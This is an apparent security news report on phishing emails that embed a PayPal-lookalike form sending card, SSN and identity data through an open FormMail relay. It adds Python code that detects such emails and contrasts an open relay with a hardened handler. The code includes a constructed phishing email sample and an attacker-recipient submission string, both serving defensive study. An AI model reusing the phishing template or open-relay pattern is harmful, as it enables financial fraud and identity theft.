New phishing attacks embed the data-collection form directly in the email itself, inducing victims to mail their financial details straight to the phishers rather than entering them on a specially constructed web site mimicking that of the financial institution.
The HTML emails masquerade as a security check on a PayPal account, with the subject "Validate Your Informations by Email" (sic). The message asks recipients to fill in an HTML form, which includes fields for the user's credit card details, date of birth, Social Security number and mother's maiden name. "Completing all of the checklist items will automatically restore your account access," the email advises. Clicking on "Submit to Secure Server" mails the form's contents to a free email account at Yahoo, using a CGI script hosted by a Brazilian hosting reseller at The Planet.
Phishing typically collects data through a web site that imitates a bank or online retailer. By putting the data collector in the HTML email, the new attack eliminates a step in the process, allowing phishing scams to steal sensitive information without constructing an elaborate fraudulent web site. Because the destination address is supplied as a field of the form rather than being fixed in the script that relays it, the phishers can re-route submissions to a fresh mailbox simply by sending a new batch of emails as earlier drop boxes are shut down.
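The structure described above is easy to spot mechanically: a mail body that carries a form posting to a host unrelated to the claimed sender, with a hidden field naming the mailbox the relay script should deliver to, and input fields asking for card or identity data. The following detector is an added example, not code from the original report or from Netcraft; the sample message, host names, field names and free-mail domains it uses are constructed for illustration.

```python
import email
from email import policy
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: a PayPal-themed HTML email carrying a data-collection
# form. Hosts, addresses and field names are hypothetical, not the real message.
SAMPLE_EMAIL = """\
From: "PayPal Security" <service@paypal.example>
To: victim@example.org
Subject: Validate Your Informations by Email
Content-Type: text/html; charset="us-ascii"

<html><body>
<p>Completing all of the checklist items will automatically restore your account access.</p>
<form method="POST" action="http://reseller.example.br/cgi-bin/formmail.pl">
<input type="hidden" name="recipient" value="dropbox123@yahoo.example">
<input type="hidden" name="subject" value="PayPal validation">
Card number: <input type="text" name="cardnum"><br>
SSN: <input type="text" name="ssn"><br>
Mother's maiden name: <input type="text" name="mmn"><br>
<input type="submit" value="Submit to Secure Server">
</form>
</body></html>
"""

# Field names that have no business in an emailed form (constructed list).
SENSITIVE = {"cardnum", "ccnum", "cvv", "ssn", "dob", "mmn", "password", "pin"}
# Free-mail domains phishers favour for drop boxes (constructed list).
FREEMAIL = {"yahoo.example", "hotmail.example", "gmail.example"}


class FormCollector(HTMLParser):
    """Collect every <form> in the body with its action URL and named inputs."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._cur = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._cur = {"action": a.get("action", ""), "inputs": {}}
        elif tag == "input" and self._cur is not None:
            name = a.get("name")
            if name:
                kind = (a.get("type") or "text").lower()
                self._cur["inputs"][name.lower()] = (kind, a.get("value", ""))

    def handle_endtag(self, tag):
        if tag == "form" and self._cur is not None:
            self.forms.append(self._cur)
            self._cur = None


def analyze_email(raw):
    """Return (severity, message) findings for one raw RFC 822 message."""
    msg = email.message_from_string(raw, policy=policy.default)
    body = msg.get_body(preferencelist=("html",))
    if body is None:          # no HTML part, nothing to embed a form in
        return []
    parser = FormCollector()
    parser.feed(body.get_content())
    sender_domain = parseaddr(msg["From"] or "")[1].rsplit("@", 1)[-1].lower()

    findings = []
    for form in parser.forms:
        host = (urlparse(form["action"]).hostname or "").lower()
        # The form posts somewhere other than the brand it claims to be.
        if host and sender_domain and not host.endswith(sender_domain):
            findings.append(("high", f"form posts to {host}, not to claimed sender domain {sender_domain}"))
        # A hidden 'recipient' field is the signature of an open form-to-mail relay.
        kind, value = form["inputs"].get("recipient", (None, ""))
        if kind == "hidden" and value:
            drop_domain = value.rsplit("@", 1)[-1].lower()
            sev = "high" if drop_domain in FREEMAIL else "medium"
            findings.append((sev, f"hidden form-to-mail recipient {value}"))
        # Fields that ask for card or identity data.
        asked = sorted(n for n in form["inputs"] if n in SENSITIVE)
        if asked:
            findings.append(("high", "form collects " + ", ".join(asked)))
    return findings


if __name__ == "__main__":
    for severity, message in analyze_email(SAMPLE_EMAIL):
        print(f"[{severity}] {message}")
```

A mail gateway can run this over inbound HTML and quarantine or tag anything that produces a high finding; the hidden `recipient` test is the strongest single signal, since legitimate senders have no reason to embed a form-to-mail destination in a message.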
The scam takes advantage of a long-known weakness in FormMail, a widely used form-to-mail Perl script first written in 1995. In early 2001 spammers began using FormMail to deliver massive volumes of spam anonymously, exploiting the script's failure to restrict who could invoke it and where it would send mail. Most hosting providers have since replaced the original FormMail with customized versions or with secure replacement scripts such as the NMS Project's FormMail. The Brazilian hosting reseller involved in this incident, Hospedagem Empresarial (www.he.com.br), is an exception.
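The weakness being abused is simply that the script delivers to whatever address the submitted form names. The pair of handlers below is an added example, not FormMail's source or the NMS code: the first reconstructs the open-relay behaviour, the second applies the two controls replacement scripts introduced, an allow-list of recipients and an allow-list of referring pages. The allow-list contents, the submissions and the `RelayRejected` type are all constructed for illustration.

```python
from urllib.parse import parse_qs, urlparse

# Constructed site policy: the only mailboxes a form on this host may deliver
# to, and the only pages allowed to host a form that posts here.
ALLOWED_RECIPIENTS = {"sales@site.example", "support@site.example"}
ALLOWED_REFERERS = {"www.site.example", "site.example"}


class RelayRejected(Exception):
    """Raised when a submission fails a relay check."""


def _fields(body):
    # Decode an application/x-www-form-urlencoded POST body; keep first value only.
    return {k: v[0] for k, v in parse_qs(body).items()}


def naive_formmail(headers, body):
    """Open-relay behaviour (reconstructed): deliver to whatever 'recipient'
    the form supplied. Any form on any site, including one embedded in an
    email, can use this host to forward data to an arbitrary mailbox."""
    fields = _fields(body)
    to = fields.pop("recipient", None)
    if not to:
        raise RelayRejected("no recipient given")
    return {"to": to, "fields": fields}


def hardened_formmail(headers, body):
    """Same interface with the checks later scripts add. Order matters for
    diagnostics only; either check alone defeats the emailed-form attack,
    and the recipient allow-list is the one that cannot be forged."""
    referer_host = urlparse(headers.get("Referer", "")).hostname or ""
    # Mail clients send no Referer, so an emailed form fails here outright.
    # A scripted POST can forge this header, which is why it is not sufficient.
    if referer_host.lower() not in ALLOWED_REFERERS:
        raise RelayRejected(f"referer {referer_host!r} not allowed")
    fields = _fields(body)
    to = fields.pop("recipient", None)
    # Destination must be fixed by the site operator, never by the form author.
    if to not in ALLOWED_RECIPIENTS:
        raise RelayRejected(f"recipient {to!r} not allowed")
    return {"to": to, "fields": fields}


def try_submit(handler, headers, body):
    """Run one submission and report ('delivered', recipient) or ('rejected', reason)."""
    try:
        return ("delivered", handler(headers, body)["to"])
    except RelayRejected as exc:
        return ("rejected", str(exc))


# Constructed submissions. The first is what the phishing email's form posts
# when the victim clicks submit: no Referer, attacker-chosen recipient.
PHISH_HEADERS = {}
PHISH_POST = "recipient=dropbox123%40yahoo.example&cardnum=4111111111111111&ssn=000-00-0000"
# A forged Referer with the same attacker-chosen recipient.
FORGED_HEADERS = {"Referer": "https://www.site.example/contact.html"}
# A genuine contact-form submission from the site's own page.
LEGIT_HEADERS = {"Referer": "https://www.site.example/contact.html"}
LEGIT_POST = "recipient=sales%40site.example&message=hello"

if __name__ == "__main__":
    print("naive, phish:    ", try_submit(naive_formmail, PHISH_HEADERS, PHISH_POST))
    print("hardened, phish: ", try_submit(hardened_formmail, PHISH_HEADERS, PHISH_POST))
    print("hardened, forged:", try_submit(hardened_formmail, FORGED_HEADERS, PHISH_POST))
    print("hardened, legit: ", try_submit(hardened_formmail, LEGIT_HEADERS, LEGIT_POST))
```

The forged-Referer case is the one to keep in mind when auditing a customized FormMail: a script that checks only the referring page still relays for anyone willing to script the POST, so the recipient allow-list (or a recipient hard-coded in the script) is the control to insist on.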
The Netcraft Anti-Phishing Toolbar is blocking this attack, as the toolbar can block access to insecure scripts being used in phishing attacks. The toolbar is available for both Internet Explorer and Firefox.